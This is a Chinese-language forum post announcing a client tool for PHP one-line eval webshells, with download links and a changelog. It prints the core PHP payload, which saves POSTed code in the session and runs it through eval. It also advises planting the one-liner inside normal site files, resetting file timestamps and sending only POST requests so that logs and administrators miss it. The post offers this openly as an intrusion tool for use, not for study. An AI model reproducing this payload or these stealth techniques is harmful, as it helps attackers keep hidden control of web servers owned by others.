-----------------------------
1.修補了下原始版本有些服務器不能正常運行的大Bug。
2.去掉了提交后的登陸密碼驗證,提交后直接進入大馬界面。
-----------------------------
更新說明:
-----------------------------
這玩意本來就是為了方便自己做的,所以本來只打算對自己負責,呵呵。好馬好工具如果傳出來必然被傳爛掉,但這東西無所謂,又不是多特別的東西,但有時候用著比較方便,所以發出來也無妨。
但是發出來后有朋友告訴我有些服務器上運行沒成功,心里頓覺愧疚,發個小東西出來,結果功能還有問題,豈不是欺騙大眾。但是一直在忙,除了當時做的 時候之外,幾乎再沒去測試過。昨晚hiphop兄給我說他那有臺服務器用不起,本來打算讓他發Shell來我正好測試下具體原因,結果他說他已經測試了并 告訴是magic_quotes_gpc的原因(是個低級錯誤...),得謝謝他。
然后花了個把小時詳細測試并修改了下
相關關鍵代碼:
session_start();$_SESSION[chr(99)]=get_magic_quotes_gpc()?stripslashes($_POST[chr(100)]):$_POST[chr(100)];eval($_SESSION[chr(99)]);
-----------------------------
現在的版本magic_quotes_gpc On和Off都測試OK,不過不知道還有沒有其它會造成不正常的因素,實在懶的自己去一個一個測試了,等遇到了再說吧,也歡迎大家反饋。
-----------------------------
下載:
http://evilwares.appspot.com/down/zerosoul_PHP_eval_Client_v0.2.rar
在線使用:
http://evilwares.appspot.com/static/eval.html
--------------------
前天通宵到后半夜的時候,總覺得自己最近都沒干什么實事,覺得有點虛度的味道,心中不免有些自責。為了寬慰自己,決定做點正事。然后就啥都沒干,坐著干想該做什么。一直想到快天亮,總算想出點東西來了(- -!),也就是現在發布的這個東西。
海洋頂端有個一鍵提交版的ASP一句話客戶端,很方便,一次提交之后,一句話就可以當大馬用了。用這種客戶端的話,留一句話的shell也就麻煩不到哪去了,而且把一句話藏在正常文件里面,再把時間改回正常,訪問只用POST的話,基本是很難發現的。
但是PHP一句話一直沒有見這樣的客戶端(不知道是不是我孤弱寡聞),網上居然還有轉載的到處都是的工具,結果下載下來不能用.....
比較喜歡一句話的一鍵提交這種形式,所以花了2 x 半個通宵的時間做了這個東西,思路參考的是海洋,客戶端的CSS也是修改它的,呵呵。
注意:
由于一鍵提交版的特殊性,暫時是不能隨心所欲的換密碼的,這個客戶端的密碼是字母c。(海洋的也是這樣)。這個問題并不是不能解決,但是比較麻煩,所以還不如就用這密碼呢,呵呵。
特點:
1.填好一句話WebShell地址和密碼并點提交之后,后續操作不用再依賴客戶端,基本上剩下的和操作大馬沒什么兩樣。
2.完全POST提交,避免了WebServer記錄敏感數據。如果一句話插在有正常用戶訪問的PHP文件的話,插完時間也改回來了,那么管理員發現的概率就相當低了。(海洋的不是全POST)
大概原理:
一鍵提交版的一句話客戶端連接成功之后,每次POST數據的時候, 假設一句話密碼是c,都要先讓本地表單:
c = session_start();eval($_SESSION[chr(120)]);
chr(120)就是字母c,為了避免單引號寫成chr(120)形式。
然后一句話在eval($_POST[c])的時候,才能執行保存在Session中的我們的PHP代碼。
想用其它密碼的朋友可以依據這個原理修改。
下載:
http://evilwares.appspot.com/down/zerosoul_PHP_eval_Client.rar